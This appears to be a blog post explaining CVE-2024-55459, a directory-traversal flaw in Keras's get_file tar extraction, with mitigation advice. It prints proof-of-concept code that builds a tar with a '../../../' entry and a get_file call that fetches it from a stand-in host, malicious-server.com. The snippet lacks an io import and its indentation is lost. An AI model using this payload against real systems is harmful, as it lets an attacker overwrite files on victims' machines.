A recently identified vulnerability, CVE-2024-55459, exists in the popular deep learning library, Keras, version 3.7.. This vulnerability permits attackers to write arbitrary files to the user's machine by downloading a manipulated tar file through the "get_file" function. This blog post will discuss the technical details of the vulnerability, provide code snippets demonstrating the exploit, and offer links to original references for further information.
Background on Keras Library
Keras is an open-source neural network library written in Python that is widely used for creating deep learning models. The library provides a simple interface for building complex neural networks using a minimalistic approach, making it a popular choice for developers working with machine learning and artificial intelligence.
Vulnerability Details
The vulnerability, CVE-2024-55459, lies in the "get_file" function, which is part of Keras's data utility module. This function is designed to download a file from a given URL, and store it locally before optionally extracting the contents of tar and zip files. By manipulating the tar file and how the "get_file" function handles file extraction, attackers can potentially write arbitrary files to the user's system.
Here is a snippet that demonstrates how an attacker could create a malicious tar file
import tarfile
tar_filename = 'malicious_sample.tar'
# Creating the malicious tar file
with tarfile.open(tar_filename, mode='w') as archive:
file_content = b'Hello, this is a malicious file content'
file_name = '../../../malicious_file.txt' # The file will be written to the target folder
tarinfo = tarfile.TarInfo(file_name)
tarinfo.size = len(file_content)
archive.addfile(tarinfo, io.BytesIO(file_content))
In the snippet above, a malicious tar archive, 'malicious_sample.tar,' is crafted to contain a file with a name that utilizes directory traversal to write a file outside of the expected directory structure. Here, the archive contains the 'malicious_file.txt' file, which will be written three directories above the intended destination.
Now, the victim can accidentally download this malicious tar file using the "get_file" function in Keras:
from tensorflow.keras.utils import get_file
url = 'https://malicious-server.com/malicious_sample.tar'; # The URL hosting the malicious tar file
# This call to get_file downloads the malicious tar file and extracts it
local_file_path = get_file('malicious_sample.tar', url, extract=True)
When a user invokes the "get_file" function to download and extract the contents of the manipulated tar archive, the malicious file will be written to the unintended directory location, ultimately giving the attacker the means to overwrite or create new files on the victim's machine without the user's knowledge.
Mitigation and Conclusion
A fix has been proposed for this vulnerability by adding additional input validation and restricting the extracted file's location. In the meantime, users are advised to exercise caution when downloading files from unknown sources, and developers should update their Keras library to the latest version once a patch is released.
Links to Original References
1. Keras Official Repository
2. CVE-2024-55459: NVD Database
In summary, CVE-2024-55459 is a vulnerability enabling attackers to write arbitrary files to a user's system through the manipulation of a tar file downloaded and extracted using Keras's "get_file" function. Users should remain vigilant when downloading files from untrusted sources and maintain up-to-date versions of their libraries to secure their systems from potential attacks.
Timeline
Published on: 01/08/2025 17:15:15 UTC
Last modified on: 01/09/2025 15:15:18 UTC